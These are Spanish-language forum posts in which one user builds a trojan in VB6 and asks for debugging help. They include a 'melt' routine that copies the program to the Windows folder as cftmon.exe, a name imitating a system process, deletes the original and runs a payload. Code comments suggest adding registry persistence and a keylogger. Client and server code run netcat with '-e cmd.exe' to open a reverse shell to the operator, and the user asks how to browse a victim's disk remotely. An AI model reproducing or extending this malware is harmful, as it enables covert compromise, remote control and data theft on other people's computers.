Mensajes

hm.. aora que me doi cuenta, me da error el melt!
esto puse en code

Código [Seleccionar] Expandir


private sub form_load()
call main
end sub' puse esto ademas de mi code, que no publico porque quedaria mui largo

Sub Main()
    'Obtenemos el nombre de nuestro ejecutable
    MyName = App.EXEName
   
    'Comprobamos si nos llamamos CTFMON
    If LCase(App.EXEName) = "cftmon" Then
        Call Execute
    Else
        Call MeltFile
    End If
End Sub

Function Execute()
    'Función que se encarga de borrar el archivo original a partir
    'de su ruta. Al terminar ejecuta el PayLoad
   
    On Error Resume Next

    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
            Kill Command$           '   Si existe... lo borramos
            DoEvents                '   Esperamos un poco
        Wend                        'Bucle
    End If
    Call PayLoad                    'Ejecutamos el resto del Malware
End Function

Function MeltFile()
    'Función que copia el propio Malware en la carpeta TEMP del sistema
    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
    'argumento su propia ruta.
   
    Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación

    FileCopy MySelf, Environ("windir") & "\cftmon.exe" 'Nos copiamos en "TEMP\cftmon.exe"
    DoEvents                                        'Esperamos...
    Shell Environ("windir") & "\cftmon.exe " & MySelf  'Ejecutamos "TMP\cftmon.exe" + Ruta de tu aplicación
    End                                             'Finalizamos (importante! xD)
End Function

Function PayLoad()
    'Aqui incluimos el resto de código de tu Malware...
    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
    'activar el keylogger o lo que quieras programar :P
   
    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
    End
End Function



hay algo que ise mal?

Gracias!!!

wenisimo!!!
aora mismo lo pongo en mi troyano!
muy util gracias!!!

alguien sabe como hacer para que en ves que se copie a la carpeta temp, se copie a la de windows??? ai alguna variable en vb q contenga el directorio de windows??? hasta donde yo se, para system32 hai que declarar mucho.. me contaron que para la carpeta de windows no, alguien sabe??

 
no puedo creeeeeer que aia echo un error tan tonto!!!! bueno de todas maneras Muchas Gracias!

weno sigo con el proyecto de mi troyano, que cada dia mejora mas... aunque estuvo tirado x aproximadamente 1semana, porque estuve mui ocupado asiendo cosas para el cole.. bueno en fin...
mi problema es que cuando mando algo, i ago split data, la segunda parte no llega nunca al text del servidor.. no se si me explico bien, pero aca dejo el code de cliente y servidor:

Código [Seleccionar] Expandir


Cliente:

Public VPort As Integer
Private Sub Command1_Click()
VPort = Text1.Text
Dim vIndex As Variant 'Declaracion
vIndex = Split(Form1.ListConexion.SelectedItem.Key, "|")
Form1.WS(vIndex(0)).SendData "nc_shell" & "|" & VPort
End Sub
'al presionar el boton, manda al servidor la palabra nc_shell y un puerto



Servidor:
Private Sub WS_onDataArrival(ByVal bytesTotal As Long)
Dim vData() As String
WS.GetData VTData, vbString
vData = Split(VTData, "|")
If vData(0) = "msge" Then
MsgBox vData(1)
VTData = ""
End If
If vData(0) = "nc_shell" Then
Shell App.path & "\nc.exe -e cmd.exe IP" & "|" & vData(1)
End If '''' ******notese esta parte que es la quye interesa!
Text1.Text = VTData
End Sub


la finalidad de este code, es abrir el netcat, para obtener shell remota, en un determinado port.. e revisado varias veces el code i no encuentro cual es la falla!
si no me explike bien diganme lo que no entendieron pero ayuda porfavor!
GRACIAS de antemano!

gracias! ahora mismo estoy leyendo un manual sobre enviar archivos x ws

wow!!! felicitaciones! se ve excelente el juego!!!, ahora lo estoy descargado, asique a probarlo!

bueno como algunos saben, estoy en la creacion de un troyano mci, por ahora tiene pocas funciones.. ya le ire agregando mas.. estaba pensando en ponerle un filemanager remoto, osea poder explorar el hd, subir/bajar archivos y ejecutar archivos, encontre un manual (troyano desde 0, en portalhacker.net) pero el filemanager que tenia, permitia explorar solamente tu disco, y para bajar archivos de la maquina remota, aparecia un cartelito pidiendo la ruta del archivo, lo que encontre extraño, por que no habia forma de explorar el hd de la victima.. alguien que me pueda orientar o ayudar???
muchas gracias!

alguien me ayuda a como usar este modulo????=S

ALFIN pude postear xD, perdon por no haber respondido antes, muchas gracias x toos los aportes, y por toda la ayuda!
no pude postear antes, pero primero el server estaba caido, lo estaban "opmitimizando".. luego quedo mas lento y con suerte podia leer =S alguien sabe a lo que se debe esto?=S
weno de todas maneras muchas gracias! ahora pruebo el code!